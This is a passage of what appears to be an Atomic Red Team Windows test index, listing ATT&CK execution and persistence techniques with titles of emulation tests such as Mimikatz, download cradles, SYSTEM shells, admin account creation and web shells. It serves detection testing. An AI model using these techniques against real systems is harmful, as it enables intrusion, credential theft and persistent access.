- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1055.012 Process Injection: Process Hollowing](../../T1055.012/T1055.012.md)
- Atomic Test #1: Process Hollowing using PowerShell [windows]
- Atomic Test #2: RunPE via VBA [windows]
- T1068 Exploitation for Privilege Escalation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- [T1134.005 Access Token Manipulation: SID-History Injection](../../T1134.005/T1134.005.md)
- Atomic Test #1: Injection SID-History with mimikatz [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1088 Bypass User Account Control [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.010 Event Triggered Execution: AppInit DLLs](../../T1546.010/T1546.010.md)
- Atomic Test #1: Install AppInit Shim [windows]
- [T1546.002 Event Triggered Execution: Screensaver](../../T1546.002/T1546.002.md)
- Atomic Test #1: Set Arbitrary Binary as Screensaver [windows]
- T1134 Access Token Manipulation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1055.005 Thread Local Storage [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.002 Hijack Execution Flow: DLL Side-Loading](../../T1574.002/T1574.002.md)
- Atomic Test #1: DLL Side-Loading using the Notepad++ GUP.exe binary [windows]
- Atomic Test #2: DLL Side-Loading using the dotnet startup hook environment variable [windows]
- [T1037.001 Boot or Logon Initialization Scripts: Logon Script (Windows)](../../T1037.001/T1037.001.md)
- Atomic Test #1: Logon Scripts [windows]
- T1055.015 ListPlanting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1484 Domain Policy Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.008 Boot or Logon Autostart Execution: LSASS Driver](../../T1547.008/T1547.008.md)
- Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- [T1055.001 Process Injection: Dynamic-link Library Injection](../../T1055.001/T1055.001.md)
- Atomic Test #1: Process Injection via mavinject.exe [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Bind System Shell using UsoClient DLL load technique [windows]
- [T1546.007 Event Triggered Execution: Netsh Helper DLL](../../T1546.007/T1546.007.md)
- Atomic Test #1: Netsh Helper DLL Registration [windows]
- [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
- Atomic Test #1: Create local account with admin privileges [windows]
- Atomic Test #3: WinPwn - Loot local Credentials - powerhell kittie [windows]
- Atomic Test #4: WinPwn - Loot local Credentials - Safetykatz [windows]
- [T1574.012 Hijack Execution Flow: COR_PROFILER](../../T1574.012/T1574.012.md)
- Atomic Test #1: User scope COR_PROFILER [windows]
- Atomic Test #2: System Scope COR_PROFILER [windows]
- Atomic Test #3: Registry-free process scope COR_PROFILER [windows]
# execution
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- [T1047 Windows Management Instrumentation](../../T1047/T1047.md)
- Atomic Test #1: WMI Reconnaissance Users [windows]
- Atomic Test #2: WMI Reconnaissance Processes [windows]
- Atomic Test #3: WMI Reconnaissance Software [windows]
- Atomic Test #4: WMI Reconnaissance List Remote Services [windows]
- Atomic Test #5: WMI Execute Local Process [windows]
- Atomic Test #6: WMI Execute Remote Process [windows]
- Atomic Test #7: Create a Process using WMI Query and an Encoded Command [windows]
- Atomic Test #8: Create a Process using obfuscated Win32_Process [windows]
- Atomic Test #9: WMI Execute rundll32 [windows]
- Atomic Test #10: Application uninstall using WMIC [windows]
- T1129 Shared Modules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.007 JavaScript [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1121 Regsvcs/Regasm [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1559.002 Inter-Process Communication: Dynamic Data Exchange](../../T1559.002/T1559.002.md)
- Atomic Test #1: Execute Commands [windows]
- Atomic Test #2: Execute PowerShell script via Word DDE [windows]
- Atomic Test #3: DDEAUTO [windows]
- [T1204.002 User Execution: Malicious File](../../T1204.002/T1204.002.md)
- Atomic Test #1: OSTap Style Macro Execution [windows]
- Atomic Test #2: OSTap Payload Download [windows]
- Atomic Test #3: Maldoc choice flags command execution [windows]
- Atomic Test #4: OSTAP JS version [windows]
- Atomic Test #5: Office launching .bat file from AppData [windows]
- Atomic Test #6: Excel 4 Macro [windows]
- Atomic Test #7: Headless Chrome code execution via VBA [windows]
- Atomic Test #8: Potentially Unwanted Applications (PUA) [windows]
- Atomic Test #9: Office Generic Payload Download [windows]
- Atomic Test #10: LNK Payload Download [windows]
- Atomic Test #11: Mirror Blast Emulation [windows]
- T1559.001 Component Object Model [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1106 Native API](../../T1106/T1106.md)
- Atomic Test #1: Execution through API - CreateProcess [windows]
- Atomic Test #2: WinPwn - Get SYSTEM shell - Pop System Shell using CreateProcess technique [windows]
- Atomic Test #3: WinPwn - Get SYSTEM shell - Bind System Shell using CreateProcess technique [windows]
- Atomic Test #4: WinPwn - Get SYSTEM shell - Pop System Shell using NamedPipe Impersonation technique [windows]
- T1085 Rundll32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1117 Regsvr32 [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059 Command and Scripting Interpreter [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1175 Component Object Model and Distributed COM [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1191 CMSTP [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1064 Scripting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1196 Control Panel Items [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1072 Software Deployment Tools](../../T1072/T1072.md)
- Atomic Test #1: Radmin Viewer Utility [windows]
- Atomic Test #2: PDQ Deploy RAT [windows]
- [T1059.001 Command and Scripting Interpreter: PowerShell](../../T1059.001/T1059.001.md)
- Atomic Test #1: Mimikatz [windows]
- Atomic Test #2: Run BloodHound from local disk [windows]
- Atomic Test #3: Run Bloodhound from Memory using Download Cradle [windows]
- Atomic Test #4: Obfuscation Tests [windows]
- Atomic Test #5: Mimikatz - Cradlecraft PsSendKeys [windows]
- Atomic Test #6: Invoke-AppPathBypass [windows]
- Atomic Test #7: Powershell MsXml COM object - with prompt [windows]
- Atomic Test #8: Powershell XML requests [windows]
- Atomic Test #9: Powershell invoke mshta.exe download [windows]
- Atomic Test #10: Powershell Invoke-DownloadCradle [windows]
- Atomic Test #11: PowerShell Fileless Script Execution [windows]
- Atomic Test #12: PowerShell Downgrade Attack [windows]
- Atomic Test #13: NTFS Alternate Data Stream Access [windows]
- Atomic Test #14: PowerShell Session Creation and Use [windows]
- Atomic Test #15: ATHPowerShellCommandLineParameter -Command parameter variations [windows]
- Atomic Test #16: ATHPowerShellCommandLineParameter -Command parameter variations with encoded arguments [windows]
- Atomic Test #17: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations [windows]
- Atomic Test #18: ATHPowerShellCommandLineParameter -EncodedCommand parameter variations with encoded arguments [windows]
- Atomic Test #19: PowerShell Command Execution [windows]
- Atomic Test #20: PowerShell Invoke Known Malicious Cmdlets [windows]
- Atomic Test #21: PowerUp Invoke-AllChecks [windows]
- Atomic Test #22: Abuse Nslookup with DNS Records [windows]
- T1170 Mshta [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1061 Graphical User Interface [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1559 Inter-Process Communication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1203 Exploitation for Client Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1028 Windows Remote Management [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1059.006 Command and Scripting Interpreter: Python [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1569 System Services [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.003 Command and Scripting Interpreter: Windows Command Shell](../../T1059.003/T1059.003.md)
- Atomic Test #1: Create and Execute Batch Script [windows]
- Atomic Test #2: Writes text to a file and displays it. [windows]
- Atomic Test #3: Suspicious Execution via Windows Command Shell [windows]
- Atomic Test #4: Simulate BlackByte Ransomware Print Bombing [windows]
- Atomic Test #5: Command Prompt read contents from CMD file and execute [windows]
- T1223 Compiled HTML File [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1059.005 Command and Scripting Interpreter: Visual Basic](../../T1059.005/T1059.005.md)
- Atomic Test #1: Visual Basic script execution to gather local computer information [windows]
- Atomic Test #2: Encoded VBS code execution [windows]
- Atomic Test #3: Extract Memory via VBA [windows]
- T1173 Dynamic Data Exchange [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1204.001 Malicious Link [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1569.002 System Services: Service Execution](../../T1569.002/T1569.002.md)
- Atomic Test #1: Execute a Command as a Service [windows]
- Atomic Test #2: Use PsExec to execute a command on a remote host [windows]
- Atomic Test #4: BlackCat pre-encryption cmds with Lateral Movement [windows]
- [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
- Atomic Test #1: At.exe Scheduled task [windows]
- T1035 Service Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1086 PowerShell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1118 InstallUtil [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# persistence
- [T1053.005 Scheduled Task/Job: Scheduled Task](../../T1053.005/T1053.005.md)
- Atomic Test #1: Scheduled Task Startup Script [windows]
- Atomic Test #2: Scheduled task Local [windows]
- Atomic Test #3: Scheduled task Remote [windows]
- Atomic Test #4: Powershell Cmdlet Scheduled Task [windows]
- Atomic Test #5: Task Scheduler via VBA [windows]
- Atomic Test #6: WMI Invoke-CimMethod Scheduled Task [windows]
- Atomic Test #7: Scheduled Task Executing Base64 Encoded Commands From Registry [windows]
- Atomic Test #8: Import XML Schedule Task with Hidden Attribute [windows]
- Atomic Test #9: PowerShell Modify A Scheduled Task [windows]
- T1067 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037 Boot or Logon Initialization Scripts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.007 Path Interception by PATH Environment Variable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1044 File System Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.013 Event Triggered Execution: PowerShell Profile](../../T1546.013/T1546.013.md)
- Atomic Test #1: Append malicious start-process cmdlet [windows]
- T1543 Create or Modify System Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1133 External Remote Services](../../T1133/T1133.md)
- Atomic Test #1: Running Chrome VPN Extensions via the Registry 2 vpn extension [windows]
- T1109 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542.001 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.011 Hijack Execution Flow: Services Registry Permissions Weakness](../../T1574.011/T1574.011.md)
- Atomic Test #1: Service Registry Permissions Weakness [windows]
- Atomic Test #2: Service ImagePath Change with reg.exe [windows]
- T1542.003 Bootkit [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547 Boot or Logon Autostart Execution](../../T1547/T1547.md)
- Atomic Test #1: Add a driver [windows]
- T1013 Port Monitors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.014 Active Setup](../../T1547.014/T1547.014.md)
- Atomic Test #1: HKLM - Add atomic_test key to launch executable as part of user setup [windows]
- Atomic Test #2: HKLM - Add malicious StubPath value to existing Active Setup Entry [windows]
- Atomic Test #3: HKLM - re-execute 'Internet Explorer Core Fonts' StubPath payload by decreasing version number [windows]
- T1180 Screensaver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1543.003 Create or Modify System Process: Windows Service](../../T1543.003/T1543.003.md)
- Atomic Test #1: Modify Fax service to run PowerShell [windows]
- Atomic Test #2: Service Installation CMD [windows]
- Atomic Test #3: Service Installation PowerShell [windows]
- Atomic Test #4: TinyTurla backdoor service w64time [windows]
- [T1137 Office Application Startup](../../T1137/T1137.md)
- Atomic Test #1: Office Application Startup - Outlook as a C2 [windows]
- T1547.012 Print Processors [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.001 Hijack Execution Flow: DLL Search Order Hijacking](../../T1574.001/T1574.001.md)
- Atomic Test #1: DLL Search Order Hijacking - amsi.dll [windows]
- T1103 AppInit DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1137.006 Office Application Startup: Add-ins](../../T1137.006/T1137.006.md)
- Atomic Test #1: Code Executed Via Excel Add-in File (Xll) [windows]
- [T1505.002 Server Software Component: Transport Agent](../../T1505.002/T1505.002.md)
- Atomic Test #1: Install MS Exchange Transport Agent Persistence [windows]
- T1053 Scheduled Task/Job [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1556.002 Modify Authentication Process: Password Filter DLL](../../T1556.002/T1556.002.md)
- Atomic Test #1: Install and Register Password Filter DLL [windows]
- T1505.005 Terminal Services DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1176 Browser Extensions](../../T1176/T1176.md)
- Atomic Test #1: Chrome (Developer Mode) [linux, windows, macos]
- Atomic Test #2: Chrome (Chrome Web Store) [linux, windows, macos]
- Atomic Test #3: Firefox [linux, windows, macos]
- Atomic Test #4: Edge Chromium Addon - VPN [windows, macos]
- T1058 Service Registry Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.005 Outlook Rules [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.011 Event Triggered Execution: Application Shimming](../../T1546.011/T1546.011.md)
- Atomic Test #1: Application Shim Installation [windows]
- Atomic Test #2: New shim database files created in the default shim database directory [windows]
- Atomic Test #3: Registry key creation and/or modification events for SDB [windows]
- [T1547.010 Boot or Logon Autostart Execution: Port Monitors](../../T1547.010/T1547.010.md)
- Atomic Test #1: Add Port Monitor persistence in Registry [windows]
- T1205 Traffic Signaling [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1038 DLL Search Order Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1050 New Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.009 Boot or Logon Autostart Execution: Shortcut Modification](../../T1547.009/T1547.009.md)
- Atomic Test #1: Shortcut Modification [windows]
- Atomic Test #2: Create shortcut to cmd in startup folders [windows]
- T1062 Hypervisor [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1182 AppCert DLLs [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.005 Boot or Logon Autostart Execution: Security Support Provider](../../T1547.005/T1547.005.md)
- Atomic Test #1: Modify SSP configuration in registry [windows]
- T1004 Winlogon Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1131 Authentication Package [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1574.008 Hijack Execution Flow: Path Interception by Search Order Hijacking](../../T1574.008/T1574.008.md)
- Atomic Test #1: powerShell Persistence via hijacking default modules - Get-Variable.exe [windows]
- [T1505.003 Server Software Component: Web Shell](../../T1505.003/T1505.003.md)
- Atomic Test #1: Web Shell Written to Disk [windows]
- [T1078.001 Valid Accounts: Default Accounts](../../T1078.001/T1078.001.md)
- Atomic Test #1: Enable Guest account with RDP capability and admin privileges [windows]
- Atomic Test #2: Activate Guest Account [windows]
- [T1547.003 Time Providers](../../T1547.003/T1547.003.md)
- Atomic Test #1: Create a new time provider [windows]
- Atomic Test #2: Edit an existing time provider [windows]
- T1183 Image File Execution Options Injection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1031 Modify Existing Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.001 Create Account: Local Account](../../T1136.001/T1136.001.md)
- Atomic Test #3: Create a new user in a command prompt [windows]
- Atomic Test #4: Create a new user in PowerShell [windows]
- Atomic Test #6: Create a new Windows admin user [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.004 Boot or Logon Autostart Execution: Winlogon Helper DLL](../../T1547.004/T1547.004.md)
- Atomic Test #1: Winlogon Shell Key Persistence - PowerShell [windows]
- Atomic Test #2: Winlogon Userinit Key Persistence - PowerShell [windows]
- Atomic Test #3: Winlogon Notify Key Logon Persistence - PowerShell [windows]
- Atomic Test #4: Winlogon HKLM Shell Key Persistence - PowerShell [windows]
- Atomic Test #5: Winlogon HKLM Userinit Key Persistence - PowerShell [windows]
- T1019 System Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1042 Change Default File Association [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1108 Redundant Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1101 Security Support Provider [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.012 Event Triggered Execution: Image File Execution Options Injection](../../T1546.012/T1546.012.md)
- Atomic Test #1: IFEO Add Debugger [windows]
- Atomic Test #2: IFEO Global Flags [windows]
- Atomic Test #3: GlobalFlags in Image File Execution Options [windows]
- T1177 LSASS Driver [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.005 Executable Installer File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.008 Event Triggered Execution: Accessibility Features](../../T1546.008/T1546.008.md)
- Atomic Test #1: Attaches Command Prompt as a Debugger to a List of Target Processes [windows]
- Atomic Test #2: Replace binary of sticky keys [windows]
- Atomic Test #3: Create Symbolic Link From osk.exe to cmd.exe [windows]
- T1504 PowerShell Profile [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1136.002 Create Account: Domain Account](../../T1136.002/T1136.002.md)
- Atomic Test #1: Create a new Windows domain admin user [windows]
- Atomic Test #2: Create a new account similar to ANONYMOUS LOGON [windows]
- Atomic Test #3: Create a new Domain Account using PowerShell [windows]
- T1542.002 Component Firmware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.001 Office Template Macros [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1138 Application Shimming [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.009 Event Triggered Execution: AppCert DLLs](../../T1546.009/T1546.009.md)
- Atomic Test #1: Create registry persistence via AppCert DLL [windows]
- T1098.005 Device Registration [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1542 Pre-OS Boot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1205.001 Port Knocking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.003 Event Triggered Execution: Windows Management Instrumentation Event Subscription](../../T1546.003/T1546.003.md)
- Atomic Test #1: Persistence via WMI Event Subscription - CommandLineEventConsumer [windows]
- Atomic Test #2: Persistence via WMI Event Subscription - ActiveScriptEventConsumer [windows]
- Atomic Test #3: Windows MOFComp.exe Load MOF File [windows]
- T1060 Registry Run Keys / Startup Folder [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1554 Compromise Client Software Binary [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1023 Shortcut Modification [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.001 Event Triggered Execution: Change Default File Association](../../T1546.001/T1546.001.md)
- Atomic Test #1: Change Default File Association [windows]
- T1122 Component Object Model Hijacking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1015 Accessibility Features [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574.010 Services File Permissions Weakness [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1547.001 Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder](../../T1547.001/T1547.001.md)
- Atomic Test #1: Reg Key Run [windows]
- Atomic Test #2: Reg Key RunOnce [windows]
- Atomic Test #3: PowerShell Registry RunOnce [windows]
- Atomic Test #4: Suspicious vbs file run from startup Folder [windows]
- Atomic Test #5: Suspicious jse file run from startup Folder [windows]
- Atomic Test #6: Suspicious bat file run from startup Folder [windows]
- Atomic Test #7: Add Executable Shortcut Link to User Startup Folder [windows]
- Atomic Test #8: Add persistance via Recycle bin [windows]
- Atomic Test #9: SystemBC Malware-as-a-Service Registry [windows]
- Atomic Test #10: Change Startup Folder - HKLM Modify User Shell Folders Common Startup Value [windows]
- Atomic Test #11: Change Startup Folder - HKCU Modify User Shell Folders Startup Value [windows]
- Atomic Test #12: HKCU - Policy Settings Explorer Run Key [windows]
- Atomic Test #13: HKLM - Policy Settings Explorer Run Key [windows]
- Atomic Test #14: HKLM - Append Command to Winlogon Userinit KEY Value [windows]
- Atomic Test #15: HKLM - Modify default System Shell - Winlogon Shell KEY Value [windows]
- Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
- [T1098 Account Manipulation](../../T1098/T1098.md)
- Atomic Test #1: Admin Account Manipulate [windows]
- Atomic Test #2: Domain Account and Group Manipulate [windows]
- Atomic Test #9: Password Change on Directory Service Restore Mode (DSRM) Account [windows]
- T1574.013 KernelCallbackTable [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1137.003 Outlook Forms [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1574 Hijack Execution Flow [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1505.004 IIS Components [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546 Event Triggered Execution](../../T1546/T1546.md)
- Atomic Test #1: Persistence with Custom AutodialDLL [windows]
- Atomic Test #2: HKLM - Persistence using CommandProcessor AutoRun key (With Elevation) [windows]
- Atomic Test #3: HKCU - Persistence using CommandProcessor AutoRun key (Without Elevation) [windows]
- [T1547.002 Authentication Package](../../T1547.002/T1547.002.md)
- Atomic Test #1: Authentication Package [windows]
- T1128 Netsh Helper DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1546.015 Event Triggered Execution: Component Object Model Hijacking](../../T1546.015/T1546.015.md)
- Atomic Test #1: COM Hijacking - InprocServer32 [windows]
- Atomic Test #2: Powershell Execute COM Object [windows]
- Atomic Test #3: COM Hijacking with RunDLL32 (Local Server Switch) [windows]
- Atomic Test #4: COM hijacking via TreatAs [windows]
- [T1137.004 Office Application Startup: Outlook Home Page](../../T1137.004/T1137.004.md)
- Atomic Test #1: Install Outlook Home Page Persistence [windows]
- [T1574.009 Hijack Execution Flow: Path Interception by Unquoted Path](../../T1574.009/T1574.009.md)
- Atomic Test #1: Execution of program.exe as service with unquoted service path [windows]
- T1100 Web Shell [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1078.002 Domain Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1034 Path Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1037.003 Network Logon Script [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1197 BITS Jobs](../../T1197/T1197.md)
- Atomic Test #1: Bitsadmin Download (cmd) [windows]
- Atomic Test #2: Bitsadmin Download (PowerShell) [windows]
- Atomic Test #3: Persist, Download, & Execute [windows]
